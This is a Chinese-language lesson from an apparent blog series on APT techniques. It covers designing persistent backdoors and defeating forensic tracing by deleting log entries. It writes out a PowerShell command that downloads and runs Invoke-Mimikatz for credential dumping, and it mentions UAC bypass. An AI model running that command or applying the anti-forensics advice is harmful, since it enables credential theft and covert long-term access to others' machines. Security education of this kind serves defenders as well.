第五十九課:高級持續(xù)滲透-第三季關(guān)于后門補(bǔ)充二
專注APT攻擊與防御
https://micropoor.blogspot.com/
前者的話:從第三季開始引入段子,讓本枯燥的學(xué)術(shù)文章,也變得生動有趣。
第二季的Demo遵循人性五條來設(shè)計,回憶這其中五條:
1:攻擊方與防御方的本質(zhì)是什么?
增加對方的時間成本,人力成本,資源成本(不限制于服務(wù)器資源),金錢成本。
2:安全公司的本質(zhì)是什么?
盈利,最小投入,最大產(chǎn)出。
3:安全公司產(chǎn)品的本質(zhì)是什么?
能適應(yīng)大部分客戶,適應(yīng)市場化,并且適應(yīng)大部分機(jī)器。(包括不限制于資源緊張,寬帶不足等問題的客戶)
4:安全人員的本質(zhì)是什么?
賺錢,養(yǎng)家。買房,還房貸。導(dǎo)致,快速解決客戶問題(無論暫時還是永久性解決),以免投訴。
5:對接客戶的本質(zhì)是什么?
對接客戶也是某公司內(nèi)安全工作的一員,與概念4相同。
6:線索排查與反線索排查
那么這個demo離可高級可持續(xù)性滲透后門還有一段距離,這里引入第六條“線索排查”與“反線索排查”,在第二季的demo中,它生成了一個名為micropoor.txt的文件,如果經(jīng)驗豐富的安全人員可根據(jù)時間差來排查日記,demo的工作流程大致是這樣的,打開notepad++,生成micropoor.txt,寫入內(nèi)容,關(guān)閉文件流。根據(jù)線索排查,定位到notepad++,導(dǎo)致權(quán)限失控。
在線索排查概念中,這里要引入“ABC”類線索關(guān)聯(lián)排查,當(dāng)防御者在得到線索A,順藤到B,最后排查到目標(biāo)文件C,根據(jù)五條中的第一條,demo要考慮如何刪除指定日志內(nèi)容,以及其他操作。來阻止ABC類線索關(guān)聯(lián)排查。不要思維固死在這是一個nontepad++后門的文章,它是一個面向類后門,面向的是可掌握源碼編譯的類后門。同樣不要把思維固定死在demo中的例子,針對不同版本的NT系統(tǒng),完全引用“powershell IEX (New-Object

System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-
Mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz”而關(guān)于bypass UAC,已經(jīng)有成熟的源碼?;虬l(fā)送至遠(yuǎn)程或是寫在

本地的圖片里,不要讓知識,限制了后門的想象。這也正是第一季所說的:一個優(yōu)秀的Microdoor是量身目標(biāo)制定且一般不具備通用性的。是的,一般不具備通用性。
觀看目前文章的一共有2類人,一類攻擊方,一類防守方。假設(shè)一個場景,現(xiàn)在擺在你面前有一臺筆記本,并且這臺筆記本有明確的后門,你的任務(wù),排查后門。我想所有人都會排查注冊表,服務(wù),端口,進(jìn)程等。因為這些具備通用性,也同樣具備通用性排查手段。臨近文章結(jié)尾,第三次引用:在后門的進(jìn)化對抗中,rootkit也發(fā)生了變化,最大的改變是它的系統(tǒng)層次結(jié)構(gòu)發(fā)生了變化。如果徹底理解了這段話。那么就要引用王健X爸爸的一句話:先定個小目標(biāo),控它個1825天。
/*
段子
*/
奈何廠商不重視后滲透攻擊與持久性攻擊,文章的結(jié)尾引用馬X爸爸的一句話:
廠商不改變,我們就改變廠商。

Micropoor
?